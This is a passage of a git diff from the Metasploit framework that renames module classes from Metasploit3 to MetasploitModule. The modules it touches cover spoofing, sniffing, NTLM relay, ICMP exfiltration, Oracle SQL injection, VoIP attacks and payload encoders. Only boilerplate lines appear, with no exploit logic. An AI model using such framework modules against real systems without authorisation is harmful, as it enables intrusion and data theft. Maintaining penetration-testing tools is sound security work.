-class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 88c9c5f125..5a44757437 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index c6bb913e8a..c47b1601e2 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 285232a1fa..44b90c3df1 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -15,7 +15,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 18ef1934ae..0033a03077 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb index 7d8e18556b..86ec17abe3 100644 --- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb +++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/ms15_134_mcl_leak.rb b/modules/auxiliary/server/ms15_134_mcl_leak.rb index 1b97e2d2ea..896e05a6be 100644 --- a/modules/auxiliary/server/ms15_134_mcl_leak.rb +++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'cgi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb index b30cb8c6b8..e197916a7e 100644 --- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb +++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index f316d4100d..3146aff0db 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/pxeexploit.rb b/modules/auxiliary/server/pxeexploit.rb index a2a7815f82..b635394bf1 100644 --- a/modules/auxiliary/server/pxeexploit.rb +++ b/modules/auxiliary/server/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index 1695eeb3e2..aec82408ff 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -7,7 +7,7 @@ require 'thread' require 'msf/core' require 'rex/proto/proxy/socks4a' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index 547253c0b9..5e7d1e6e57 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/tftp.rb b/modules/auxiliary/server/tftp.rb index 92466df2ee..491e9802d3 100644 --- a/modules/auxiliary/server/tftp.rb +++ b/modules/auxiliary/server/tftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'tmpdir' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/auxiliary/server/tnftp_savefile.rb index 26e4894234..2c1222705a 100644 --- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/auxiliary/server/tnftp_savefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index c46d0dc197..c955636e3d 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/wget_symlink_file_write.rb b/modules/auxiliary/server/wget_symlink_file_write.rb index 7c1393b655..b8e9ce41e8 100644 --- a/modules/auxiliary/server/wget_symlink_file_write.rb +++ b/modules/auxiliary/server/wget_symlink_file_write.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/wpad.rb b/modules/auxiliary/server/wpad.rb index 087e30c9d5..0b99424ff1 100644 --- a/modules/auxiliary/server/wpad.rb +++ b/modules/auxiliary/server/wpad.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index d2551d6e13..8dc5e2f964 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index e60bac50ee..5bbef15970 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/spoof/cisco/cdp.rb b/modules/auxiliary/spoof/cisco/cdp.rb index b320ad39ab..12b1118e85 100644 --- a/modules/auxiliary/spoof/cisco/cdp.rb +++ b/modules/auxiliary/spoof/cisco/cdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture def initialize diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index 99635b7b88..a9ab5ea1ac 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 252269ec00..4960895c92 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index e6b76e176e..b15069e1ae 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -9,7 +9,7 @@ require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index 6b881e849e..f4292229b1 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/spoof/llmnr/llmnr_response.rb b/modules/auxiliary/spoof/llmnr/llmnr_response.rb index b94cb212c8..59a2f02999 100644 --- a/modules/auxiliary/spoof/llmnr/llmnr_response.rb +++ b/modules/auxiliary/spoof/llmnr/llmnr_response.rb @@ -8,7 +8,7 @@ require 'socket' require 'ipaddr' require 'net/dns' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb index 56be4ad3f2..887dfb492b 100644 --- a/modules/auxiliary/spoof/nbns/nbns_response.rb +++ b/modules/auxiliary/spoof/nbns/nbns_response.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb index c2a8526b1b..74b97e94da 100644 --- a/modules/auxiliary/spoof/replay/pcap_replay.rb +++ b/modules/auxiliary/spoof/replay/pcap_replay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 321e6274cf..9c91ad82f0 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index 94a89cafaa..044e891078 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index ec27e9811d..550371ede9 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 7b91469936..ac55375e17 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb index c0022ed351..1d19d2c094 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index f4fb58a5de..1ce9b91f56 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index d7d10f96fc..f702167af9 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index d37f8afa39..3d7d30f039 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index e6a178033c..19000fa3e5 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index e26375ae12..e2e0520df4 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index e3df57ecb9..b6384a70ea 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 4ecfd3accb..a01efd8bc6 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 878c2b01d6..aa36759b4c 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 0ae6f375c2..163d335998 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 93d6a71e4b..701050daf0 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index fac34e6d92..18c8f676f8 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index d97591d2da..50afc10cc0 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/voip/asterisk_login.rb b/modules/auxiliary/voip/asterisk_login.rb index a05995214d..51022dbfd7 100644 --- a/modules/auxiliary/voip/asterisk_login.rb +++ b/modules/auxiliary/voip/asterisk_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb index 54bf04b7c3..6f35f80783 100644 --- a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb +++ b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index cccf08529f..2c7a8005c3 100644 --- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/voip/sip_deregister.rb b/modules/auxiliary/voip/sip_deregister.rb index 1369b7b231..d934835c9b 100644 --- a/modules/auxiliary/voip/sip_deregister.rb +++ b/modules/auxiliary/voip/sip_deregister.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index 5ee141c27c..96468a23d9 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/telisca_ips_lock_control.rb b/modules/auxiliary/voip/telisca_ips_lock_control.rb index 3f40c00489..690fe6c93a 100644 --- a/modules/auxiliary/voip/telisca_ips_lock_control.rb +++ b/modules/auxiliary/voip/telisca_ips_lock_control.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb index 6421fdb954..41769d2e7b 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_query.rb b/modules/auxiliary/vsploit/malware/dns/dns_query.rb index 0a91a507cb..0cd89c9c3a 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_query.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb index 097746a5d4..27821cd788 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/pii/email_pii.rb b/modules/auxiliary/vsploit/pii/email_pii.rb index d68bbbdea6..bd317eb561 100644 --- a/modules/auxiliary/vsploit/pii/email_pii.rb +++ b/modules/auxiliary/vsploit/pii/email_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # # This module sends pii via an attacker smtp machine diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index 2046f60300..f65a49e748 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # # This module acts as an compromised webserver distributing PII Data diff --git a/modules/encoders/cmd/echo.rb b/modules/encoders/cmd/echo.rb index 95911f0ded..9428e684a1 100644 --- a/modules/encoders/cmd/echo.rb +++ b/modules/encoders/cmd/echo.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = GoodRanking diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index 16e62302ef..cf565b8388 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Has some issues, but overall it's pretty good Rank = ManualRanking diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index 602b3508d2..431d0a54f7 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Below normal ranking because this will produce incorrect code a lot of # the time. diff --git a/modules/encoders/cmd/perl.rb b/modules/encoders/cmd/perl.rb index 0236e0191e..40c8ab0871 100644 --- a/modules/encoders/cmd/perl.rb +++ b/modules/encoders/cmd/perl.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = NormalRanking diff --git a/modules/encoders/cmd/powershell_base64.rb b/modules/encoders/cmd/powershell_base64.rb index e30a7a359a..ccadc43acf 100644 --- a/modules/encoders/cmd/powershell_base64.rb +++ b/modules/encoders/cmd/powershell_base64.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ExcellentRanking def initialize diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index c713d4379a..d0bf51c6d7 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Has some issues, but overall it's pretty good # - printf(1) may not be available diff --git a/modules/encoders/generic/eicar.rb b/modules/encoders/generic/eicar.rb index 7db8116178..280389b784 100644 --- a/modules/encoders/generic/eicar.rb +++ b/modules/encoders/generic/eicar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Set to ManualRanking because actually using ths encoder will # certainly destroy any possibility of a successful shell. diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 6703a746d8..601c77b0ea 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder def initialize super( diff --git a/modules/encoders/mipsbe/byte_xori.rb b/modules/encoders/mipsbe/byte_xori.rb index dbe78d536b..f65650fdfc 100644 --- a/modules/encoders/mipsbe/byte_xori.rb +++ b/modules/encoders/mipsbe/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor Rank = NormalRanking diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index a0fe137c57..e1f5d061d1 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/mipsle/byte_xori.rb b/modules/encoders/mipsle/byte_xori.rb index 7492549ead..d620e9d82a 100644 --- a/modules/encoders/mipsle/byte_xori.rb +++ b/modules/encoders/mipsle/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor Rank = NormalRanking diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 2e1eff8ab9..10c5a368ea 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index 05327a5233..ae99c2170b 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = GreatRanking def initialize diff --git a/modules/encoders/ppc/longxor.rb 